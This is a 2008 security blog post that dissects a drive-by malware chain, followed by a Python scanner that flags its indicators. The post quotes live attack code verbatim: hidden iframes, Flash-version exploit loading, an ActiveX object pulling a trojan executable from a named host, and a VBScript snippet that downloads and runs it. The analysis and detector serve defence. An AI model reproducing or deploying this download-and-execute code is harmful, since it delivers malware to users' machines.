Archive for August 6, 2008

jjmaobuduo.3322.org/csrss/w.js

Posted in sql injection on August 6, 2008 by s3cu

A new round of attacks has started.
w.js contains an iframe whose src is http://www.plgou.com/csrss/htm.htm, and htm.htm in turn contains these iframes:

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm calls i1.html if the browser is MSIE, otherwise f2.html (presumably Firefox). Depending on the Flash Player version, the matching Flash exploit is retrieved:

var version=deconcept.SWFObjectUtil.getPlayerVersion();
// Only Flash Player 9 is targeted; the minor revision picks which SWF is loaded
if(version['major']==9){
    document.getElementById('flashversion').innerHTML="";
    if(version['rev']==115){
        var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']==64){
        var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']==47){
        var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']==45){
        var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']==28){
        var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']==16){
        var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
    }else if(version['rev']>=124){
        // patched revisions get nothing
        if(document.getElementById){document.getElementById('flashversion').innerHTML=""}
    }
}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

An infrequently used CLSID, with the codebase attribute pointing straight at the trojan executable so that the browser fetches it as if it were an ActiveX install.

office.htm contains the Snapshot Viewer exploit.

yahoo.htm exploits a Yahoo! Messenger ActiveX control to download and run the trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>
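The pages quoted above share a handful of static tells a defender can key on: zero-height iframes chaining to further landing pages, an <object> whose codebase attribute points at an .exe, the ActiveX CLSIDs used for the download, SWFObject branching on the Flash Player revision, and a VBScript block that calls GetFile and then WScript.Shell. The script below is an added example, not code from this post or from the attack kit: it runs those heuristics over constructed fragments shaped like the ones quoted here (the dropper host is replaced with the placeholder dropper.example.invalid, and the CLSID watchlist holds only the two values the post quotes) and scores each fragment by how many indicator classes it trips.

```python
import re
from typing import Dict, List

# CLSIDs quoted in the post above; a real deployment would load a maintained
# watchlist instead of this two-entry one.
WATCHLIST_CLSIDS = {
    "7E0CDEE7-DC80-4F37-9410-790BB5E9270E": "ksx.htm object with .exe codebase",
    "24F3EAD6-8B87-4C1A-97DA-71C126BDA08F": "yahoo.htm object driving GetFile",
}

_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_OBJECT = re.compile(r"<object\b[^>]*>", re.I)
_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
_CLSID = re.compile(r"clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})", re.I)
_EXE_CODEBASE = re.compile(r"codebase\s*=\s*['\"]?([^'\"\s>]*\.exe)", re.I)
_REV_BRANCH = re.compile(r"version\[['\"]rev['\"]\]\s*==\s*(\d+)")
_SWF_SRC = re.compile(r"new\s+SWFObject\(\s*['\"]([^'\"]+\.swf)['\"]", re.I)
_VBS_DROPPER = re.compile(r"\.GetFile\b|WScript\.Shell|WshShell\.Run", re.I)


def _attrs(tag: str) -> Dict[str, str]:
    """Crude attribute parser that copes with the unquoted attributes seen above."""
    return {k.lower(): (v1 or v2 or v3 or "") for k, v1, v2, v3 in _ATTR.findall(tag)}


def scan_fragment(html: str) -> Dict[str, List[str]]:
    """Return, per indicator class, the concrete values found in one page fragment."""
    findings: Dict[str, List[str]] = {
        "hidden_iframe": [], "watchlist_clsid": [], "exe_codebase": [],
        "flash_rev_branch": [], "swf_payload": [], "vbs_dropper": [],
    }
    for tag in _IFRAME.findall(html):
        a = _attrs(tag)
        # width=100 height=0 is the shape used in htm.htm: present in the DOM, invisible
        if a.get("height", "").strip() in ("0", "0px") or a.get("width", "").strip() in ("0", "0px"):
            findings["hidden_iframe"].append(a.get("src", "?"))
    for tag in _OBJECT.findall(html):
        m = _CLSID.search(tag)
        if m and m.group(1).upper() in WATCHLIST_CLSIDS:
            findings["watchlist_clsid"].append(m.group(1).upper())
        m = _EXE_CODEBASE.search(tag)
        if m:
            findings["exe_codebase"].append(m.group(1))
    findings["flash_rev_branch"] = sorted(set(_REV_BRANCH.findall(html)), key=int)
    findings["swf_payload"] = _SWF_SRC.findall(html)
    findings["vbs_dropper"] = sorted({t.lower() for t in _VBS_DROPPER.findall(html)})
    return findings


def risk_score(findings: Dict[str, List[str]]) -> int:
    """One point per indicator class present; two or more is a strong drive-by signal."""
    return sum(1 for v in findings.values() if v)


def triage(fragments: Dict[str, str]) -> Dict[str, int]:
    return {name: risk_score(scan_fragment(html)) for name, html in fragments.items()}


# Constructed samples mirroring the shapes quoted in the post (host replaced).
SAMPLE_HTM_HTM = """
<iframe src=flash.htm width=100 height=0></iframe>
<iframe src=06014.html width=100 height=0></iframe>
<iframe src=yahoo.htm width=100 height=0></iframe>
"""
SAMPLE_FLASH_JS = """
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
  if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
}
"""
SAMPLE_KSX_HTM = ('<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" '
                  'codebase="http://dropper.example.invalid/csrss/rondll32.exe#version=1,0,0,1" '
                  'width="800" height="191"></object>')
SAMPLE_YAHOO_HTM = r"""
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://dropper.example.invalid/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>
"""
# Benign control: an ordinary Flash Player object plus a normal-sized ad iframe.
SAMPLE_BENIGN = ('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="400" height="300"></object>'
                 '<iframe src="ads.html" width="300" height="250"></iframe>')

SAMPLES = {
    "htm.htm": SAMPLE_HTM_HTM, "flash.js": SAMPLE_FLASH_JS, "ksx.htm": SAMPLE_KSX_HTM,
    "yahoo.htm": SAMPLE_YAHOO_HTM, "benign.htm": SAMPLE_BENIGN,
}

if __name__ == "__main__":
    for name, score in triage(SAMPLES).items():
        print(f"{name:10s} score={score} {scan_fragment(SAMPLES[name])}")
```

The hub page scores only one point on its own (hidden iframes are common in ad code), which is why the chain is worth following: each leaf page trips two independent classes, and the benign control trips none. Regex over raw markup is deliberately cheap so it can run on proxy-captured responses; it will miss obfuscated variants, so treat a hit as a reason to detonate the page, not as the final verdict.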